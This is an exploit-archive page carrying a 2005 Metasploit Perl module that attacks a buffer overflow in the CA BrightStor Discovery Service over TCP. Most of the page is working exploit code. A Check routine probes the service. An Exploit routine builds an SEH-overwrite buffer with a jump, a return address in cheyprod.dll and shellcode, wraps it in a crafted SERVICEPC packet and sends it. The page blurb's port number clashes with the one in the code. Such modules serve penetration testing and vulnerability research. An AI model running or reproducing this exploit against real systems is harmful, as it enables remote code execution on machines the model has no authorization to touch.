cabrightstor_disco_servicepc.pm

cabrightstor_disco_servicepc.pm: Posted Feb 18, 2005; Authored by H D Moore | Site metasploit.com; CA BrightStor Discovery Service SERVICEPC Overflow for Win32, win2000, winxp, and win2003 which exploits a vulnerability in the TCP listener on port 45123. Affects all known versions of the BrightStor product. More information available here.; tags | exploit, overflow, tcp; systems | windows; SHA-256 | 06aea5c93f017821b6f5bb745269cc286814e9aac984c4e232a1da82215c07b2; Download | Favorite | View

cabrightstor_disco_servicepc.pm


##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::cabrightstor_disco_servicepc;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
  'Name'     => 'CA BrightStor Discovery Service SERVICEPC Overflow',
  'Version'  => '$Revision: 1.2 $',
  'Authors'  => [ 'H D Moore <hdm [at] metasploit.com>' ],
  'Arch'     => [ 'x86' ],
  'OS'       => [ 'win32', 'win2000', 'winxp', 'win2003' ],
  'Priv'     => 1,
  'AutoOpts' => { 'EXITFUNC' => 'process' },
  
  'UserOpts' => 
  {
    'RHOST' => [1, 'ADDR', 'The target address'],
    'RPORT' => [1, 'PORT', 'The target port', 41523],
  },

  'Payload' => 
  {
    'Space'     => 2048,
    'BadChars'  => "\x00",
    'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",  # add esp, -3500          
    'Keys'    => ['+ws2ord'],
  },

  'Description'  => Pex::Text::Freeform(qq{
    This module exploits a vulnerability in the CA BrightStor
    Discovery Service. This vulnerability occurs when a specific
    type of request is sent to the TCP listener on port 41523. This
    vulnerability was discovered by cybertronic[at]gmx.net and affects
    all known versions of the BrightStor product. This module is based
    on the 'cabrightstor_disco' exploit by Thor Doomen.
  }),

  'Refs'    => 
  [
    ['URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
  ],
  
  'Targets' => 
  [
    ['cheyprod.dll 12/12/2003', 0x23805714], # pop/pop/ret
  ],
  
  'Keys'    => ['brightstor'],
  };

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Check {
  my $self = shift;
  my $target_host = $self->GetVar('RHOST');
  my $target_port = $self->GetVar('RPORT');

  # Connection #1 should not receive a response
  my $s = Msf::Socket::Tcp->new
  (
    'PeerAddr'  => $target_host,
    'PeerPort'  => $target_port,
  );

  if ($s->IsError) {
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return $self->CheckCode('Connect');
  }

  $s->Send("META");
  my $res = $s->Recv(-1, 1);
  $s->Close;

  if ($res) {
    $self->PrintLine("[*] The discovery returned a strange response: $res");
  }

  # Connection #2 should receive the hostname of the target
  my $s = Msf::Socket::Tcp->new
  (
    'PeerAddr'  => $target_host,
    'PeerPort'  => $target_port,
  );

  if ($s->IsError) {
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return $self->CheckCode('Connect');
  }

  $s->Send("hMETA");
  my $res = $s->Recv(-1, 1);
  $s->Close;

  if (! $res) {
    $self->PrintLine("[*] The discovery service did not respond to our query");
    return $self->CheckCode('Generic');
  }

  $self->PrintLine("[*] Discovery service active on host: $res");
  return $self->CheckCode('Detected');
}

sub Exploit {
  my $self = shift;
  my $target_host = $self->GetVar('RHOST');
  my $target_port = $self->GetVar('RPORT');
  my $target_idx  = $self->GetVar('TARGET');
  my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  my $target = $self->Targets->[$target_idx];

  $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

  my $s = Msf::Socket::Tcp->new
  (
    'PeerAddr'  => $target_host,
    'PeerPort'  => $target_port,
  );

  if ($s->IsError) {
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return;
  }


  my $poof = Pex::Text::EnglishText(4096);
  
  # Overwriting the return address works well, but the only register
  # pointing back to our code is 'esp'. The following stub overwrites
  # the SEH frame instead, making things a bit easier.
  
  substr($poof, 1024, 2, "\xeb\x06");  
  substr($poof, 1028, 4, pack('V', $target->[1]));
  substr($poof, 1032, length($shellcode), $shellcode);
  
  # Make sure the return address is invalid to trigger SEH
  substr($poof, 900, 100, chr(128 + rand()*127) x 100);
  
  my $bang = 
    "\x9b".
    "SERVICEPC".
    "\x18".
    pack('N', 0x01020304).
    "SERVICEPC".
    "\x01\x0c\x6c\x93\xce\x18\x18\x41".
    $poof;

  $self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
  $s->Send($bang);
  
  # Closing the socket too early breaks the exploit
  $s->Recv(-1, 5);

  return;
}

1;

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

cabrightstor_disco_servicepc.pm

cabrightstor_disco_servicepc.pm

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cabrightstor_disco_servicepc.pm

Share This

cabrightstor_disco_servicepc.pm

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems